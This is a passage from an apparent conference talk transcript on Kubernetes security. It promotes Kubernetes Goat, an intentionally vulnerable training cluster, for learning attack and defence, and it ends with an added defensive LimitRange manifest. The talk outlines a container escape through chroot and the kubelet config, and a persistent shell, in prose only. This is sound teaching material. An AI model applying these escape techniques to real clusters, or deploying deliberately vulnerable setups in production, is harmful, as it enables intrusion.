Because that's part of Kubernetes native, not part of the node, right? Even if you upgrade the cluster, you have a shell back because it's very persistent. So there are a ton of attacks. I think these are some of them I just showcased from some of my experience of hacking some of the clusters, right? So I just wanted to stop here because I can keep talking and hacking. So let's go back to some of the things we wanted to talk about, right? Because we are almost running out of time also, right? So, oh, sorry. I don't want to play this again. Yeah. Because you've seen a lot of interesting hacks, right? I don't know if you learned anything, but yeah, it was definitely fun for me to hack them. So how can you practice them, right? So that you can go and protect these clusters, or even see if you have these kinds of vulnerabilities. So that's the whole education piece that is missing, at least some of the things we have seen in the real world, right? So that is where I wanted to introduce you to a project called Kubernetes Goat, which is one of the fun projects I have created, which basically has a bunch of intentional vulnerabilities, like the hacks I have shown, and the real-world security tools also, like Cilium Tetragon or Falco, Kyverno, right? All of the CNCF tools, right? So how you can use these kinds of security things to learn and play in a real-world way, just like a hacker, right? So you are able to understand and see how you can hack and protect these clusters, right? A very big disclaimer: please do not run this in your production workloads. This has a bunch of vulnerabilities, as you've seen. Basically, you are giving me a backdoor tomorrow to hack your cluster, right? So please do not ever run it on your production clusters, right? So, okay, this all looks fancy. Maybe I'm not a security person. Can I still use Kubernetes Goat, right? So definitely it's catered to a bunch of people.
Like if you have someone coming from a hacker's background, like attackers or a red team, you can just learn security or the offensive game of Kubernetes, right, or the CNCF side. And someone on the defense side is able to learn these techniques so that you are able to defend or prevent, what kind of logs to look for, what kind of attacks to detect, right? If you are completely on the developer or DevOps team, you can also learn and understand a simple misconfiguration of a NodePort, which is where this all started, right? All of this could have been prevented, or maybe some of it, right? I have even seen it adopted by companies like Microsoft Defender Research. They use Kubernetes Goat to test whether their product is really working, right? So they are able to detect these attacks. So we have seen really good use cases. These are a bunch of the scenarios you can learn and play in Kubernetes Goat. We have 22 scenarios of live hacking and defense. So you are able to go and try it out yourself and learn Kubernetes security, right? So how can I set it up? Definitely you can go ahead and spin up any cluster, including k3s or kind; you are able to get up and running with the Kubernetes Goat project, right? It's as simple as you just go ahead and git clone and bash and deploy. Oh, sorry. Yeah, you should be able to see these pods up and running. This is the home page. Basically you have a simple home page to help guide you. So one of the biggest things lacking in the industry is documentation. So that is what we focused on, at least when building the project, right? So someone like you can basically head over to the project called Kubernetes Goat. This is the welcome page, by the way. I'm trying to find my mouse. So you basically pretty much have fantastic documentation, like why the project was created, getting started, how you can do it and, before you even learn Kubernetes security, how you can learn Kubernetes, and some of the examples.
And also some of the cheat sheets of the commands, and also some of the mappings to the OWASP Top 10, some of the real-world practices and which scenario you can play so that you are able to fix them, right? So it also maps back to a very popular framework called MITRE, like the kill chain, the cyber kill chain, right? Like how they use the ATT&CK framework, right? So a bunch of these scenarios are available. So you can also look at each scenario. So we have, for example, container escape, right? So if you click on the scenario, you are able to have each and every detail of the attack, right? Okay, now I just showed, if you look at it, we got container access, we used chroot, you escaped out of the container and you used the kubelet config, you escaped to another lateral node. So you have pretty much step-by-step guidance, like how we can attack and what the goals are, some fun hints and some solution walkthroughs as well. So pretty much it's like a fancy tool, right? So I would highly recommend giving it a try, and we have some examples with Tetragon, right? How we can detect certain attacks, or like what are the things we have seen in the real world, and maybe you can go and fix these things, right? And we also had a bunch of reports from the open source tools, how they can detect these attacks in the real world, and can they detect them or what kinds of things are missing as well. So yeah, give it a try. And pretty much we have a Discord as well, if someone wants to try it out, and it has a bunch of feedback from the community. At least these are the things. So this is one thing I wanted to give back to the community so that you can go back and learn, and it's useful to practice. And as I said, these are some of the mappings, and if you want to explore, you can go and check out this project and repository.
Yeah, by the way, this is a fun talk from Microsoft about how they use Kubernetes Goat to basically test whether Defender is really working or not, detecting these attacks in Microsoft Azure cloud; it's used by a bunch of people as well, like security vendors. So some of the key takeaways, because we are almost at the end of the talk, sorry for that. A lot of gaps in the knowledge; that is one of the biggest gaps in the security industry and even in the modern ecosystem, right? There are tons of tools and technologies coming out day in and day out. So we need to understand the technology to solve the security problems, and definitely you need to see the maturity model, right? The tool can be super good, but it may not be matured from a security point of view, right? So there are lots of resources and frameworks and tools, but they may not be practical enough. So you need to see, is it really adding value or making an impact? So basically think like a hacker, just go and defend like a security person, right? So this is pretty much it; please spread the love of Kubernetes Goat with the people, at least your team and other people. And I got some cool stickers of Kubernetes Goat, very limited edition, by the way. Please grab them; I'll be here or outside, anywhere you can find me. And with that, thank you so much.
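The talk mentions that the resource-hijacking demo (the stress tool standing in for a crypto miner) only works because the namespace had no resource limits or limit ranges. The manifest below is an added example, not a file from the talk or from the Kubernetes Goat repository, showing the kind of LimitRange that would have capped it. The namespace name and the CPU/memory values are assumptions to be tuned per workload.

```yaml
# Added example (not from the talk or Kubernetes Goat): a LimitRange that caps
# what any single container in the namespace can consume, so a miner or a
# stress tool cannot hijack the whole node. Namespace name and sizes are
# assumptions; tune them to your workloads.
apiVersion: v1
kind: LimitRange
metadata:
  name: container-limits
  namespace: default
spec:
  limits:
  - type: Container
    # Injected into containers that declare no limits at all, so a pod
    # dropped in by an attacker still gets a ceiling.
    default:
      cpu: "500m"
      memory: "256Mi"
    # Injected into containers that declare no requests.
    defaultRequest:
      cpu: "100m"
      memory: "128Mi"
    # Hard ceiling: a pod that asks for more is rejected at admission,
    # regardless of what the manifest author wrote.
    max:
      cpu: "2"
      memory: "1Gi"
    min:
      cpu: "50m"
      memory: "32Mi"
```

Apply it with `kubectl apply -f limitrange.yaml`; it is enforced by the LimitRanger admission plugin, so it only affects pods created after it exists. A LimitRange bounds each container; pair it with a ResourceQuota if you also want to bound the namespace total. As the talk notes, miners that deliberately stay under a cgroup budget will not be stopped by this; the point is to cap blast radius, not to detect.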